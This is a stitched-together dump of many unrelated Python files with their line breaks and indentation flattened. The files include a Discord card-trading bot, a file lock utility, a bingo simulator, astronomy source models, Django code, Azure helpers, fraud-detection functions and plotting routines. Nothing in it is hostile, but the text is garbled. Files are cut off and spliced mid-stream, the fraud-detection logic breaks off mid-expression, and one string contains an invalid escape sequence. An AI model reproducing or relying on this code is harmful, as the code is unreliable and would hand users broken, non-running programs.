embed = discord.Embed(color=0xFAA61A, description="We found these members who match your card search.") embed.set_author(name="{} Traders".format(card), icon_url="https://i.imgur.com/dtSMITE.jpg") embed.set_thumbnail(url="https://royaleapi.github.io/cr-api-assets/cards/{}.png".format(card.replace(" ", "-").lower())) embed.set_footer(text=credits, icon_url=credits_url) trades = await self.sortTrades(server, author, trades) givers = "\u200b" wanters = "\u200b" for player in trades: try: if trades[player][0]: member = server.get_member(player) givers += "• {} ".format(member.display_name) if trades[player][2]: givers += " - Token :white_check_mark: " else: givers += " - Token :x: " givers += "\n" if trades[player][1]: member = server.get_member(player) wanters += "• {} ".format(member.display_name) if trades[player][2]: wanters += " - Token :white_check_mark: " else: wanters += " - Token :x: " wanters += "\n" except AttributeError: pass if len(givers) > 1024: givers = givers[:1000 - len(givers)] + "..." embed.add_field(name="Giving {}".format(card), value=givers + "\n\u200b", inline=False) if len(wanters) > 1024: wanters = wanters[:1000 - len(wanters)] + "..." embed.add_field(name="Want {}".format(card), value=wanters + "\n\u200b", inline=False) await ctx.send(embed=embed) @trade.group(name="token") async def trade_token(self, ctx): """Add/Remove token """ pass @trade_token.command(name="add") async def token_add(self, ctx, token): """Add trade token""" if token in token_type: author = ctx.message.author token = token.lower() try: await self.saveToken(author, token) except KeyError: return await ctx.send("Error, Invalid token") await ctx.send("You now have a {} token".format(token)) else: await ctx.send("Thats not a valid token type") @trade_token.command(name="remove") async def token_remove(self, ctx, token): """Remove trade token""" if token in token_type: author = ctx.message.author token = token.lower() try: await self.removeToken(author, token) except KeyError: return await ctx.send("Error, Invalid token") await ctx.send("You no longer have a {} token".format(token)) else: await ctx.send("Thats not a valid token type") @trade.command() async def info(self, ctx): """Display trade data of user""" member_data = await self.database.member(ctx.author).all() pfp = ctx.author.avatar_url embed = discord.Embed(color=0xFAA61A, description="Trade user info.") embed.set_author(name="{} ".format(ctx.author.display_name), icon_url="https://i.imgur.com/dtSMITE.jpg") embed.set_thumbnail(url=pfp) embed.set_footer(text=credits, icon_url=credits_url) token = "" for rarity, value in member_data['token'].items(): if member_data['token'][rarity]: token += "• " + str(rarity) + " :white_check_mark:" + "\n" else: token += "• " + str(rarity) + " :x:" + "\n" cards_want = "" for rarity, cards in member_data['want'].items(): if member_data['want'][rarity]: cards_want += "• " + chat_formatting.humanize_list(member_data['want'][rarity]) + "\n" cards_give ="" for rarity, cards in member_data['give'].items(): if member_data['give'][rarity]: cards_give += "• " + chat_formatting.humanize_list(member_data['give'][rarity]) + "\n" if len(cards_give) > 1024: cards_give = cards_give[:1000 - len(cards_give)] + "..." if len(cards_want) > 1024: cards_want = cards_want[:1000 - len(cards_want)] + "..." embed.add_field(name="Token : ", value=token + "\n\u2", inline=False) embed.add_field(name="Want : ", value=cards_want + "\n\u200b", inline=False) embed.add_field(name="Give : ", value=cards_give + "\n\u200b", inline=False) await ctx.send(embed=embed) @trade.command() @checks.is_owner() async def deletedata(self, ctx): """ Delete all data of all members""" await self.database.clear_all_members() await ctx.send("Deleted.") zhouyijiaren/commons1000+ # ================================================================================================== # Copyright 2012 Twitter, Inc. # -------------------------------------------------------------------------------------------------- # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this work except in compliance with the License. # You may obtain a copy of the License in the LICENSE file, or at: # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ================================================================================================== __author__ = '' import os from . import lock_file, touch, unlock_file class Lock(object): """A co-operative inter-process file lock.""" @staticmethod def unlocked(): """Creates a Lock that is already released.""" return Lock(None) @staticmethod def acquire(path, onwait=None): """Attempts to lock the given path which need not exist ahead of time. By default acquire blocks as long as needed for the lock to be released if already held. If an onwait function is supplied, it will be passed the lock owner's pid when the lock cannot be acquired immediately. In this case the onwait function should return True if it wishes to block on acquisition of the Lock. Otherwise None will be returned as a signal to acquire's caller that the lock failed. """ touch(path) lock_fd = lock_file(path, blocking=False) if not lock_fd: blocking = True with open(path, 'r') as fd: pid = int(fd.read().strip()) if onwait: blocking = onwait(pid) if not blocking: return None lock_fd = lock_file(path, blocking=blocking) lock_fd.truncate(0) lock_fd.write('%d\n' % os.getpid()) lock_fd.flush() return Lock(lock_fd) def __init__(self, lock_fd): self._lock_fd = lock_fd def is_unlocked(self): """Checks whether or not this lock object is currently actively holding a lock.""" return self._lock_fd is None def release(self): """Releases this lock if held and returns True; otherwise, returns False to indicate the lock was already released. """ if self._lock_fd: unlock_file(self._lock_fd, close=True) self._lock_fd = None return True else: return False 0 sal=float(input("Informe o sálario\n")) porcentagem=int(input("Informe a porcentagem de aumento\n")) porcetagem_Do_Aumento=(sal* porcentagem)/100 novo_Salario= sal+ porcetagem_Do_Aumento print("sálario ", novo_Salario )"""" GitHub: https://github.com/4144414D/xmas-bingo Email: Usage: xmas-bingo [-o] xmas-bingo --all xmas-bingo --smart xmas-bingo --version xmas-bingo --help Options: --help Show this screen. --version Show the version. -o, --output Save winning boards to a file. -a, --all Determine results of all numbers of songs. -s, --smart Work out running wins. """ VERSION="0.1" from docopt import docopt def print_board(board): board = '{0:025b}'.format(board) return board[0:5]+'\n'+board[5:10]+'\n'+board[10:15]+'\n'+board[15:20]+'\n'+board[20:25]+'\n' def check_win(board,winning_boards): for winning_board in winning_boards: if board & winning_board == winning_board: return True return False def create_pool(songs): #poor way to determine options. could be faster pool = [] for x in range(16777215+1): #16777215 highest 24 bit number candidate = '{0:024b}'.format(x) if candidate.count('1') == songs: candidate = candidate[:12] + '1' + candidate[12:] #middle always set pool.append(int(candidate,2)) return pool def create_winning_boards(): winning_boards = [] winning_boards.append(int('1111100000000000000000000',2)) winning_boards.append(int('0000011111000000000000000',2)) winning_boards.append(int('0000000000111110000000000',2)) winning_boards.append(int('0000000000000001111100000',2)) winning_boards.append(int('0000000000000000000011111',2)) winning_boards.append(int('1000010000100001000010000',2)) winning_boards.append(int('0100001000010000100001000',2)) winning_boards.append(int('0010000100001000010000100',2)) winning_boards.append(int('0001000010000100001000010',2)) winning_boards.append(int('0000100001000010000100001',2)) winning_boards.append(int('1000001000001000001000001',2)) winning_boards.append(int('0000100010001000100010000',2)) return winning_boards def all(): for songs in range(25): print "Testing results with", print songs, print "song(s)" main(songs,False) print def new_songs(board): results = set() for x in range(25): new_song = int('0'*x + '1' + '0'*(24-x),2) new_board = new_song | board if new_board != board: results.add(new_board) return(results) def smart(): boards = ([int('0000000000001000000000000',2)]) winning_boards = create_winning_boards() song = 0 total_wins = 0 while len(boards) > 0: song += 1 print "Round number", print song print '-'*(13+len(str(song))) loosing_boards = set() candidate_boards = set() wins = 0 for board in boards: #this is slow... candidate_boards = candidate_boards | new_songs(board) for candidate_board in candidate_boards: if check_win(candidate_board,winning_boards): wins += 1 else: loosing_boards.add(candidate_board) print "Round boards: ", print len(boards) print "Winning boards:", print wins print "Loosing boards:", print len(loosing_boards) print "Total wins: ", total_wins += wins print total_wins print "Total winners: ", print (100.0/(total_wins+len(loosing_boards)))*total_wins, print "%" boards = loosing_boards print def main(songs,output): pool = create_pool(songs) winning_boards = create_winning_boards() count = 0 wins = 0 if output: f = open('winning_boards.txt','w') for board in pool: count += 1 if check_win(board,winning_boards): wins += 1 if output: f.write(print_board(board)+'\n') print "Total Count:", print count print "Wins:", print wins print "Winning percentage:", print (100.0/count)*wins, print if output: f.close() if __name__ == '__main__': arguments = docopt(__doc__, version=VERSION) if arguments['--all']: all() elif arguments['--smart']: smart() else: songs = int(arguments['']) main(songs,arguments['--output']) adamreis/rhino-fun """ Simple recursive implementation of a sierpinski triangle algorithm for Rhinocerous 5. Have fun! adamhreis at gmail dot com """ import rhinoscriptsyntax as rs import math def midpoint(p1, p2): return [(p1[0]+p2[0])/2, (p1[1]+p2[1])/2, (p1[2]+p2[2])/2] def next_triangles(t): next = [] mid1 = midpoint(t[0], t[1]) mid2 = midpoint(t[1], t[2]) mid3 = midpoint(t[0], t[2]) next.append((mid2, mid1, t[1])) next.append((mid3, mid2, t[2])) next.append((mid1, mid3, t[0])) return next; def sierpinski(scale, angle, generations): height_prop = math.sin(angle) p1 = [0.,0.,0.] p2 = [float(scale),0.,0.] p3 = [float(scale)/2, height_prop*scale,0.] _sierpinski([(p1, p2, p3)], 0, generations) def _sierpinski(triangles, current_generation, max_generation): if current_generation >= max_generation: return new_triangles = [] for t in triangles: rs.AddLine(t[0],t[1]) rs.AddLine(t[1],t[2]) rs.AddLine(t[0],t[2]) new_triangles.extend(next_triangles(t)) _sierpinski(new_triangles, current_generation+1, max_generation) if __name__ == '__main__': side_len = float(raw_input('Outer side length (defaults to 4): ') or 4) angle = float(raw_input('Angle (in radians, defaults to pi/3): ') or math.pi/3) generations = int(raw_input('Number of generations (defaults to 9): ') or 9) sierpinski(side_len, angle, generations)from django.shortcuts import render from rest_framework.views import APIView from rest_framework.response import Response from .models import Items class ItemsView(APIView): def get(self,request): if 'name' in request.GET: data=Items.objects.filter(name=request.GET['name']).values('name','price').first() else: data=Items.objects.all().values('name','price') return Response({"result":data}, status=200) def post(self,request): data = request.data print(data) item_obj = Items.objects.create(name=data['name'],price=data['price']) return Response({"message":"created"},status=202) # Create your views here. """ Module defining source surface-brightness distributions. ---- .. include license and copyright .. include:: ../include/copy.rst ---- .. include common links, assuming primary doc root is up one directory .. include:: ../include/links.rst """ import warnings import numpy from scipy import signal, special, interpolate from astropy.modeling import functional_models from ..util.frame import SemiMajorAxisCoo # TODO: Need to learn how to use abstract classes! Inherit from # numpy.ndarray? class Source: """ This is an abstract class and should not be instantiated on it's own! Attributes: x (vector): 1D vector with x coordinates X (array): 2D map of x coordinates y (vector): 1D vector with y coordinates Y (array): 2D map of y coordinates data (array): Map of the surface brightness distribution sampling (float): Sampling of the square map in arcsec/pixel. size (float): Size of the square map in arcsec. """ def __init__(self): self.x = None self.X = None self.y = None self.Y = None self.data = None self.sampling = None self.size = None def __call__(self, x, y): pass def minimum_sampling(self): pass def minimum_size(self): pass def make_map(self, sampling=None, size=None): """ Generate a square map of the surface-brightness distribution. Object is modified internally with the constructed map saved to :attr:`data`. Args: sampling (:obj:`float`, optional): The size of each pixel in the map, typically in arcsec per pixel. If None, sampling will be set by :func:`minimum_sampling`. size (:obj:`float`, optional): Length of one axis of the *square* map, typically in arcsec. Will be adjusted to ensure an integer number of pixels in the map based on :attr:`sampling`. If None, set by :func:`minimum_size`. """ if sampling is None and self.sampling is None: self.sampling = self.minimum_sampling() elif sampling is not None: self.sampling = sampling if size is None and self.size is None: self.size = self.minimum_size() elif size is not None: self.size = size # Set the number of pixels that spans the full size requested pixsize = numpy.ceil(self.size/self.sampling).astype(int) # Force the pixel size to be odd if pixsize % 2 == 0: pixsize += 1 # Adjust the size to be an integer number of pixels _size = pixsize*self.sampling if _size - self.size > 0.1*self.sampling: warnings.warn('Size reset to an integer number of pixels: ' ' {0} -> {1} arcsec'.format(self.size, _size)) self.size = _size self.y = (pixsize-1)*numpy.linspace(-0.5,0.5,pixsize)*self.sampling self.x = self.y.copy()[::-1] # Sample it self.X, self.Y = numpy.meshgrid(self.x, self.y) self.data = self.__call__(self.X, self.Y) def __getitem__(self, s): """Slice the map.""" if self.data is None: raise ValueError('Distribution data is not defined!') return self.data[s] @property def shape(self): """The shape of the current map.""" return () if self.data is None else self.data.shape def reset_map(self): """ Reset mapping attributes for a fresh determination of the sampling, size, and surface-brightness map. This is mainly used for resetting the internals when using the default sampling and size to set the map. To reconstruct the map after calling this method, run :func:`make_map`. This:: self.reset_map() self.make_map() is equivalent to this:: self.make_map(sampling=self.minimum_sampling(), size=self.minimum_size()) """ self.x = None self.X = None self.y = None self.Y = None self.data = None self.sampling = None self.size = None class OnSkyConstant(Source): """ An on-sky constant surface brightness. Args: surfbrightness (scalar-like): The constant surface brightness for the source in linear flux units per square arcsecond. sampling (scalar-like, optional): Sampling of a generated map in arcseconds per pixel. Default is set by :func:`minimum_sampling`. size (scalar-like, optional): Size of the image to generate of the distribution in *arceconds* along one of the axes. The map is square. Default is defined by :func:`minimum_size`. """ def __init__(self, surfbrightness, sampling=None, size=None): # Define internals self.surfbrightness = float(surfbrightness) # Instantiate the functional_models.Gaussian2D object super(OnSkyConstant, self).__init__() # Set the map sampling and size self.sampling = sampling self.size = size # Set the map if requested if sampling is not None or size is not None: self.make_map() def minimum_sampling(self): r""" Return the minimum sampling in arcseconds per pixels. Currently just set to 1. """ # TODO: Allow `Source` to understand when this returns None? return 1. def minimum_size(self): r""" The minimum size that should be used for the distribution map in arcseconds. Currently just set to 3. """ # TODO: Allow `Source` to understand when this returns None? return 3. def __call__(self, x, y): """ Return the surface brightness at a given location. """ return numpy.full_like(x, self.surfbrightness, dtype=float) \ if isinstance(x, numpy.ndarray) else self.surfbrightness class OnSkyGaussian(functional_models.Gaussian2D, Source): """ An on-sky Gaussian distribution. Args: fwhm (scalar-like): The FWHM of the Gaussian in *arcseconds*. center (scalar-like, optional): The coordinates of the Gaussian center in *arcseconds*. ellipticity (scalar-like, optional): The ellipticity (1-b/a) of an elliptical Gaussian distribution. position_angle (scalar-like, optional): The position angle for the elliptical Gaussian distribution, defined as the angle from N through E. The coordinate system is defined with positive offsets (in RA) toward the east, meaning lower pixel indices. sampling (scalar-like, optional): Sampling of a generated map in arcseconds per pixel. Default is set by :func:`minimum_sampling`. size (scalar-like, optional): Size of the image to generate of the distribution in *arceconds* along one of the axes. The map is square. Default is defined by :func:`minimum_size`. """ def __init__(self, fwhm, center=None, ellipticity=None, position_angle=None, sampling=None, size=None): # Define internals self.fwhm = float(fwhm) self.ellipticity = 0 if ellipticity is None else ellipticity self.position_angle = 0 if position_angle is None else position_angle sig2fwhm = numpy.sqrt(8*numpy.log(2)) major_sigma = self.fwhm/sig2fwhm minor_sigma = major_sigma * (1-self.ellipticity) # Instantiate the functional_models.Gaussian2D object super(OnSkyGaussian, self).__init__(amplitude=1/(2*major_sigma*minor_sigma*numpy.pi), x_mean=0 if center is None else center[0], y_mean=0 if center is None else center[1], x_stddev=minor_sigma, y_stddev=major_sigma, theta=-numpy.radians(self.position_angle)) # Set the integral to be normalized self.integral = 1.0 # Set the map sampling and size self.sampling = sampling self.size = size # Set the map if requested if sampling is not None or size is not None: self.make_map() def get_integral(self): """Return the analytic integral of the source.""" sig2fwhm = numpy.sqrt(8*numpy.log(2)) major_sigma = self.fwhm/sig2fwhm minor_sigma = major_sigma * (1-self.ellipticity) return self.amplitude*2*numpy.pi*major_sigma*minor_sigma def minimum_sampling(self): r""" Return the minimum sampling in arcseconds per pixels. Currently :math:`{\rm FWHM}/2`. """ return self.fwhm/2. def minimum_size(self): r""" The minimum size that should be used for the distribution map in arcseconds. Currently :math:`2\ {\rm FWHM}`. """ return self.fwhm*2. class OnSkySersic(functional_models.Sersic2D, Source): """ An on-sky Sersic distribution. Args: sb_eff (scalar-like): The surface brightness at 1 effective (half-light) radius. r_eff (scalar-like): The effective (half-light) radius in *arcseconds*. n (scalar-like): The Sersic index. center (scalar-like, optional): The coordinates of the Sersic center in *arcseconds* relative to the image center. ellipticity (scalar-like, optional): The ellipticity (1-b/a) of an elliptical Sersic distribution. position_angle (scalar-like, optional): The position angle for the elliptical Sersic distribution, defined as the angle from N through E. The coordinate system is defined with positive offsets (in RA) toward the east, meaning lower pixel indices. sampling (scalar-like, optional): Sampling of a generated map in arcseconds per pixel. Default is set by :func:`minimum_sampling`. size (scalar-like, optional): Size of the image to generate of the distribution in *arceconds* along one of the axes. The map is square. Default is defined by :func:`minimum_size`. unity_integral (:obj:`bool`, optional): Renormalize the distribution so that the integral is unity. """ def __init__(self, sb_eff, r_eff, n, center=None, ellipticity=None, position_angle=None, sampling=None, size=None, unity_integral=False): self.position_angle = 0 if position_angle is None else position_angle super(OnSkySersic, self).__init__(amplitude=sb_eff, r_eff=r_eff, n=n, x_0=0 if center is None else center[0], y_0=0 if center is None else center[1], ellip=ellipticity, theta=numpy.radians(90-self.position_angle)) self.semi = SemiMajorAxisCoo(xc=self.x_0.value, yc=self.y_0.value, pa=self.position_angle, ell=self.ellip.value) self.bn = None self.integral = self.get_integral() if unity_integral: self.amplitude /= self.integral self.integral = self.get_integral() # Set the map sampling and size self.sampling = sampling self.size = size # Set the map if requested if sampling is not None or size is not None: self.make_map() def get_integral(self): """ The analytic integral of the Sersic profile projected on the sky. """ # Note the (1-ellipticity) factor. self.bn = special.gammaincinv(2. * self.n, 0.5) return 2 * numpy.pi * self.n * numpy.exp(self.bn) * self.amplitude \ * numpy.square(self.r_eff) * (1-self.ellip) \ * special.gamma(2*self.n) * numpy.power(self.bn, -2*self.n) def minimum_sampling(self): r""" Return the minimum sampling in arcseconds per pixels. Currently :math:`R_{\rm eff}/3`. """ return self.r_eff/3. def minimum_size(self): r""" The minimum size that should be used for the distribution map in arcseconds. Currently :math:`3\ R_{\rm eff}`. """ return self.r_eff*3 # TODO: Add an input image distribution #class OnSkyImage: # def __init__(self, fitsfile): # TODO: Add a Moffat distribution class OnSkySource(Source): """ Container class for an on-sky source convolved with the seeing disk. Unlike the other :class:`Source` objects, this requires a map to work. Args: seeing (:obj:`float`, :class:`Source`): The FWHM of a Gaussian seeing distribution in arcseconds or an object used to define the seeing kernel directly. If a float is provided, the sampling of the Gaussian seeing kernel is set by :func:`OnSkyGaussian.minimum_sampling` unless adjusted by the intrinsic source object or the ``sampling`` keyword. If a :class:`Source` object, the object is used to generate a map of the source surface brightness distribution. The integral of the seeing kernel should be unity! intrinsic (:obj:`float`, :class:`Source`): The intrinsic surface brightness distribution of the source. Can be the total flux of a point source (in, e.g., 10^-17 erg/s/cm^2/angstrom) or an object. If a :class:`Source` object, the object is used to generate a map of the source surface-brightness distribution. sampling (scalar-like, optional): Sampling of a generated map in arcseconds per pixel. Default is set by :func:`minimum_sampling`. size (scalar-like, optional): Size of the image to generate of the distribution in *arceconds* along one of the axes. The map is square. Default is defined by :func:`minimum_size`. """ def __init__(self, seeing, intrinsic, sampling=None, size=None): # The seeing kernel self.seeing = OnSkyGaussian(seeing) if isinstance(seeing, float) else seeing # TODO: Make sure seeing object has unity integral! # The intrinsic source distribution self.intrinsic = intrinsic # Get the sampling self.sampling = self.minimum_sampling() if sampling is None else sampling self.size = self.minimum_size() if size is None else size # Make the map self.interp = None self.make_map() def minimum_sampling(self): r""" Return the minimum sampling in arcseconds per pixels. This is determined by the minimum of the seeing disk sampling (:attr:`seeing`) and the sampling for the intrinsic distribution (if the latter is defined). """ # Sampling in arcsec / pixel sampling = self.seeing.minimum_sampling() try: # Try using `intrinsic` as an object sampling = min(self.intrinsic.minimum_sampling(), sampling) except AttributeError: pass return sampling def minimum_size(self): """ Return the minimum size of the rendered source map in arcseconds. This is determined by the maximum of the seeing disk map size (:attr:`seeing`) and the intrinsic source map size (if the latter is defined). """ # Size in arcsec size = self.seeing.minimum_size() try: # Try using `intrinsic` as an object size = max(self.intrinsic.minimum_size(), size) except AttributeError: pass return size def make_map(self, sampling=None, size=None): """ Generate a square map of the source surface-brightness distribution. Object is modified internally with the constructed map saved to :attr:`data`. Args: sampling (:obj:`float`, optional): The size of each pixel in the map in arcsec per pixel. If None, sampling will be set by :func:`minimum_sampling`. size (:obj:`float`, optional): Length of one axis of the *square* map in arcsec. Will be adjusted to ensure an integer number of pixels in the map based on :attr:`sampling`. If None, set by :func:`minimum_size`. """ if sampling is None and self.sampling is None: self.sampling = self.minimum_sampling() elif sampling is not None: self.sampling = sampling if size is None and self.size is None: self.size = self.minimum_size() elif size is not None: self.size = size # Build the on-sky source distribution self.seeing.make_map(sampling=self.sampling, size=self.size) self.x = self.seeing.x self.X = self.seeing.X self.y = self.seeing.y self.Y = self.seeing.Y try: # Construct the intrinsic map of the source self.intrinsic.make_map(sampling=self.sampling, size=self.size) # Convolve with the seeing distribution, conserving the # integral of the intrinsic source self.data = signal.fftconvolve(self.intrinsic.data, self.seeing.data * numpy.square(self.sampling), mode='same') except AttributeError: # Renormalize the unity-integral seeing kernal for to # represent a point source self.data = self.intrinsic*self.seeing.data # Get the integral try: # After convolving with the seeing kernel, the total # integral should be the same, up to some tolerance self.integral = self.intrinsic.integral tolerance = 1e-3 diff = numpy.absolute(self.integral - numpy.square(self.sampling)*numpy.sum(self.data)) if diff > tolerance: warnings.warn('Map and analytic integrals are discrepant by {0} ({1} %)'.format( diff, 100*diff/self.integral)) except AttributeError: self.integral = numpy.square(self.sampling) * numpy.sum(self.data) # Prep for interpolation self.interp = interpolate.interp2d(self.x, self.y, self.data, bounds_error=True) # self.interp = interpolate.RectBivariateSpline(self.x, self.y, self.data) def __call__(self, x, y): """ Sample the source. This interpolates the pre-calculated source at the requested coordinate. A `ValueError` will be thrown (see `scipy.interpolate.interp2d`_) if the coordinate is outside the bounds of the calculated map. Args: x (:obj:`float`): The position in arcsec relative to the field center. Positive x is toward the East (positive RA, smaller pixel number). y (:obj:`float`): The position in arcsec relative to the field center. Positive x is toward the North (larger pixel number). Returns: :obj:`float`: The surface brightness at (x,y). """ return self.interp(x,y) # Generated by Django 3.0.4 on 2020-03-16 06:59 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('OfficeApp', '0010_episode_running_time'), ] operations = [ migrations.RemoveField( model_name='quote', name='season', ), ] import collections ## Set the experiments taht are going to be used to compute the plot list_of_experiments = ['experiment_64.yaml', 'experiment_67.yaml', 'experiment_68.yaml'] # Set the output validation and driving data # that is going to be read from each of the experiments # The plots are made correlating prediction (offline) with driving (online). # With this the user must define the pairs that are going to be correlated. # The pairs are in the form ValidationDataset: driving benchmark. The # validation dataset must exist on the COIL_DATASET_PATH data_params = {'control': '_auto', 'root_path': '_logs', 'validation_driving_pairs': {'Town01W1': 'ECCVTrainingSuite_Town01', 'Town01W1Noise': 'ECCVTrainingSuite_Town01', 'Town02W14': 'ECCVGeneralizationSuite_Town02', 'Town02W14Noise': 'ECCVGeneralizationSuite_Town02'}, } # There is not data filter data_filter = {} # The parameters processed that are going to be used for after plotting processing_params = {'Success rate': {'metric': 'control_success_rate', 'filter': {}, 'params': {}}, 'Steering absolute error': {'metric': 'steering_error', 'filter': data_filter, 'params': {}}, 'step': {'metric': 'step', 'filter': {}, 'params': {}}, 'town_id': {'metric': 'id', 'filter': {}, 'params': {}}, 'exp': {'metric': 'experiment', 'filter': {}, 'params': {}} } plot_params = collections.OrderedDict() #### Definition of the plots that are going to be made plot_params['ctrl_vs_steer_50'] = {'print': True, 'x': {'data': 'Steering absolute error', 'log': True}, 'y': {'data': 'Success rate', 'log': False}, 'size': {'data': 'step'}, 'color': {'data': 'town_id'}, 'plot_best_n_percent': 50 } ChengyuanSha/LGPWeb0 import pandas as pd import numpy as np csv_file_name = 'sample_alzheimer_vs_normal_data.csv' # change your file name here def check_csv_file(csv_file_name): try: df = pd.read_csv(csv_file_name) if 'category' not in df: print("Error. Please name your class column 'category' ") names = df.columns[1:].values if 'category' in names: print("Error. Please put 'category in the first column") X = df.iloc[:, 1:].values y = df['category'].values print('Successful!') print('Feature names: ', names) print('Feature category: ', np.unique(y)) print('Feature value: ', X) except Exception as error: print("Error: " + repr(error) ) if __name__ == "__main__": check_csv_file(csv_file_name)catalyst/contrib/mixin/blur.py from typing import List import random import numpy as np import albumentations as A class BlurMixin: """ Calculates blur factor for augmented image """ def __init__( self, input_key: str = "image", output_key: str = "blur_factor", blur_min: int = 3, blur_max: int = 9, blur: List[str] = None ): """ Args: input_key (str): input key to use from annotation dict output_key (str): output key to use to store the result """ self.input_key = input_key self.output_key = output_key self.blur_min = blur_min self.blur_max = blur_max blur = blur or ["Blur"] self.blur = [A.__dict__[x]() for x in blur] self.num_blur = len(self.blur) self.num_blur_classes = blur_max - blur_min + 1 + 1 self.blur_probability = \ (self.num_blur_classes - 1) / self.num_blur_classes def __call__(self, dictionary): image = dictionary[self.input_key] blur_factor = 0 if random.random() < self.blur_probability: blur_fn = np.random.choice(self.blur) blur_factor = int( np.random.randint(self.blur_min, self.blur_max) - self.blur_min + 1 ) image = blur_fn.apply(image=image, ksize=blur_factor) dictionary[self.input_key] = image dictionary[self.output_key] = blur_factor return dictionary import sys from azure.mgmt.hybridkubernetes import ConnectedKubernetesClient # This function returns the python client to interact with resources under the namespace 'Microsoft.Kubernetes' def get_connected_kubernetes_client(credential, subscription_id): return ConnectedKubernetesClient(credential, subscription_id) # This function returns the python client to interact with the connected cluster resource def get_connected_cluster_client(credential, subscription_id): try: return get_connected_kubernetes_client(credential, subscription_id).connected_cluster except Exception as e: sys.exit("Error occured while creating connected cluster client: " + str(e)) # This function returns a connected cluster object present in a given resource group def get_connected_cluster(cc_client, resource_group_name, cluster_name): try: return cc_client.get(resource_group_name, cluster_name) except Exception as e: sys.exit("Error occured while fetching the connected cluster resource: " + str(e))def convert_time_format(time_str): #import re time_str=re.sub("[^0-9]", "", time_str) #convert to int return int(time_str); def removeBlanks(data_set): dataset_no_blanks=[] for i in range(len(data_set)): for j in range(len(data_set.feature)): if data_set[i][j]=="": break dataset_no_blanks.append(data_set[i][j]) return dataset_no_blanks def fast_transaction(data_sets): # data_sets[i][1] # data_sets[i].features[2 sorted_data_sets = sorted(data_sets, key=lambda x: x.features[1], reverse=True) prev_data_set=sorted_data_sets[0]; for i in range(1,len(sorted_data_sets)): if prev_data_set.features[2] == sorted_data_sets[i].features[2] & prev_data_set[i].features[1] == sorted_data_sets[i].features[1]: sorted_data_sets[i].fraud="fast_trans" else: sorted_data_sets[i].fraud="none" prev_data_set=sorted_data_sets[i] return sorted_data_sets; def over_limit_transaction(data_sets): for i in range(0,len(data_sets)): if data_sets[i].features[14] 3: for j in range(0,count): if customer_trans[i-j].fraud!="inc": customer_trans[i-j].fraud="inc" def polling_fraud_flags(k, data_sets): poll=[0,0,0,0] for i in range(len(data_sets)): if data_sets[i].fraud != "none": poll[data_sets[i].cluster]=poll[data_sets[i].cluster]+1 return poll tests/py2many/loop.py def for_with_break(): for i in range(4): if i == 2: break print(i) def for_with_continue(): for i in range(4): if i == 2: continue print(i) def for_with_else(): for i in range(4): print(i) else: print("OK") def while_with_break(): i = 0 while True: if i == 2: break print(i) i += 1 def while_with_continue(): i = 0 while i < 5: i += 1 if i == 2: continue print(i) for_with_break() for_with_continue() # https://github.com/adsharma/py2many/issues/415 # for_with_else() while_with_break() while_with_continue() # -*- coding: utf-8 -*- """ Functions to plot nucleus, cytoplasm and RNA coordinates. """ import bigfish.stack as stack import matplotlib.pyplot as plt import numpy as np from .utils import save_plot, get_minmax_values from skimage.segmentation import find_boundaries from matplotlib.colors import ListedColormap def plot_volume(data_cell, id_cell, framesize=(7, 7), path_output=None, ext="png"): """Plot Cytoplasm and nucleus borders. Parameters ---------- data_cell : pandas.DataFrame Dataframe with the coordinates of the cell. id_cell : int Id of the cell volume to plot. framesize : tuple Size of the frame used to plot with 'plt.figure(figsize=framesize)'. path_output : str Path to save the image (without extension). ext : str or List[str] Extension used to save the plot. If it is a list of strings, the plot will be saved several times. Returns ------- """ # TODO Sanity check of the dataframe # get cloud points cyto = data_cell.loc[id_cell, "pos_cell"] cyto = np.array(cyto) nuc = data_cell.loc[id_cell, "pos_nuc"] nuc = np.array(nuc) # plot plt.figure(figsize=framesize) plt.plot(cyto[:, 1], cyto[:, 0], c="black", linewidth=2) plt.plot(nuc[:, 1], nuc[:, 0], c="steelblue", linewidth=2) plt.title("Cell id: {}".format(id_cell), fontweight="bold", fontsize=15) plt.tight_layout() save_plot(path_output, ext) plt.show() return def plot_rna(data_merged, id_cell, framesize=(7, 7), path_output=None, ext="png"): """Plot cytoplasm border and RNA spots. Parameters ---------- data_merged : pandas.DataFrame Dataframe with the coordinate of the cell and those of the RNA. id_cell : int ID of the cell to plot. framesize : tuple Size of the frame used to plot with 'plt.figure(figsize=framesize)'. path_output : str Path to save the image (without extension). ext : str or List[str] Extension used to save the plot. If it is a list of strings, the plot will be saved several times. Returns ------- """ # TODO Sanity check of the dataframe # get cloud points cyto = data_merged.loc[id_cell, "pos_cell"] cyto = np.array(cyto) rna = data_merged.loc[id_cell, "RNA_pos"] rna = np.array(rna) # plot plt.figure(figsize=framesize) plt.plot(cyto[:, 1], cyto[:, 0], c="black", linewidth=2) plt.scatter(rna[:, 1], rna[:, 0], c="firebrick", s=50, marker="x") plt.title("Cell id: {}".format(id_cell), fontweight="bold", fontsize=15) plt.tight_layout() save_plot(path_output, ext) plt.show() return def plot_distribution_rna(data, data_validation=None, data_test=None, framesize=(10, 5), path_output=None, ext="png"): """Plot RNA distribution. Parameters ---------- data : pandas.DataFrame Dataframe with all the data (or the train data in case of split data). data_validation : pandas.DataFrame Dataframe with the validation data data_test : pandas.DataFrame Dataframe with the test data. framesize : tuple Size of the frame used to plot with 'plt.figure(figsize=framesize)'. path_output : str Path to save the image (without extension). ext : str or List[str] Extension used to save the plot. If it is a list of strings, the plot will be saved several times. Returns ------- """ # plot one histogram if data_validation is None and data_test is None: plt.figure(figsize=framesize) plt.title("RNA distribution", fontweight="bold") plt.hist(data["nb_rna"], bins=100, color="steelblue", edgecolor='black', linewidth=1.2) plt.xlabel("Number of RNA") plt.ylabel("Frequency") plt.tight_layout() save_plot(path_output, ext) plt.show() # plot several histograms elif data_validation is not None and data_test is not None: fig, ax = plt.subplots(3, 1, sharex="col", figsize=framesize) ax[0].hist(data["nb_rna"], bins=100, color="steelblue", edgecolor='black', linewidth=1.2) ax[0].set_title("RNA distribution (train)", fontweight="bold", fontsize=15) ax[0].set_ylabel("Frequency") ax[1].hist(data_validation["nb_rna"], bins=100, color="steelblue", edgecolor='black', linewidth=1.2) ax[1].set_title("RNA distribution (validation)", fontweight="bold", fontsize=15) ax[1].set_ylabel("Frequency") 